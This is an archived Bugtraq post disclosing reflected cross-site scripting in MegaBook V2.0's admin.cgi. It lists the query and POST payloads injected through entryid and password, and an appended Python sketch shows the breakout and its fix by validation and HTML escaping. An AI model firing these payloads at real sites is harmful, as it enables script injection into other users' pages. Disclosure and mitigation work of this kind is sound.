Bugtraq mailing list archives
Re: MegaBook V2.0 - Cross Site Scripting Exploit
From: Spy Hat <spyhat () spyhat com>
Date: 8 May 2005 12:06:01 -0000
In-Reply-To: <20050505104551.23441.qmail () www securityfocus com>

The same vulnerability also exists in the new version of MegaBook V2.1

Date: 5 May 2005 10:45:51 -0000
Message-ID: <20050505104551.23441.qmail () www securityfocus com>
From: Spy Hat <spyhat () spyhat com>
To: bugtraq () securityfocus com
Subject: MegaBook V2.0 - Cross Site Scripting Exploit

The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross Site Scripting, which will allow the attacker to modify the post in the guestbook.

The affected script is admin.cgi
URL: (http://www.(yourdomain).com/(yourcgidir)/admin.cgi)

I have tested the script with the following query:

?action=modifypost&entryid="><script>alert('wvs-xss-magic-string-703410097');</script>

I have also tested the script with these POST variables:

action=modifypost&entryid=66&password=<script>alert('wvs-xss-magic-string-188784308');</script>
action=modifypost&entryid=66&password='><script>alert('wvs-xss-magic-string-486624156');</script>
action=modifypost&entryid=66&password="><script>alert('wvs-xss-magic-string-1852691616');</script>
action=modifypost&entryid=66&password=><script>alert('wvs-xss-magic-string-429380114');</script>
action=modifypost&entryid=66&password=</textarea><script>alert('wvs-xss-magic-string-723975367');</script>

Yours,
SpyHat
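
Added example, not part of the original post and not MegaBook's code: a Python sketch of why the quote, bracket and `</textarea>` variants above matter when `entryid` and `password` are echoed into a page, and how input validation plus output encoding keeps them as data. The template, the function names and the assumption that `entryid` is numeric (as in `entryid=66`) are illustrative.

```python
import html
import re
from html.parser import HTMLParser

# Constructed stand-in for a page that echoes both parameters (MegaBook's real
# markup is not in the report): quoted attributes and a textarea body.
TEMPLATE = (
    '<input type="hidden" name="entryid" value="{entryid}">\n'
    "<input type='password' name='password' value='{password}'>\n"
    '<textarea name="echo">{password}</textarea>\n'
)

class _ScriptCounter(HTMLParser):
    def __init__(self):
        super().__init__()
        self.count = 0
    def handle_starttag(self, tag, attrs):
        if tag == "script":  # markup the parser treats as a real element
            self.count += 1

def script_tags(page):
    counter = _ScriptCounter()
    counter.feed(page)
    counter.close()
    return counter.count

def render_unsafe(entryid, password):
    # Reflects request values verbatim, the behaviour the report describes.
    return TEMPLATE.format(entryid=entryid, password=password)

def render_safe(entryid, password):
    # Assumption: entryid is a record number, so accept digits only.
    if not re.fullmatch(r"[0-9]{1,10}", entryid):
        raise ValueError("entryid must be numeric")
    # Encode & < > " ' so the value stays data in attribute and element contexts.
    return TEMPLATE.format(entryid=entryid, password=html.escape(password, quote=True))

# Strings shaped like those in the report, marker text shortened (constructed).
PAYLOADS = [
    "<script>alert(1);</script>",
    "'><script>alert(1);</script>",
    '"><script>alert(1);</script>',
    "><script>alert(1);</script>",
    "</textarea><script>alert(1);</script>",
]

if __name__ == "__main__":
    for p in PAYLOADS:
        print(script_tags(render_unsafe("66", p)), script_tags(render_safe("66", p)), repr(p))
```
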
Current thread:
- MegaBook V2.0 - Cross Site Scripting Exploit Spy Hat (May 05)
- <Possible follow-ups>
- Re: MegaBook V2.0 - Cross Site Scripting Exploit Morning Wood (May 06)
- Re: MegaBook V2.0 - Cross Site Scripting Exploit Spy Hat (May 09)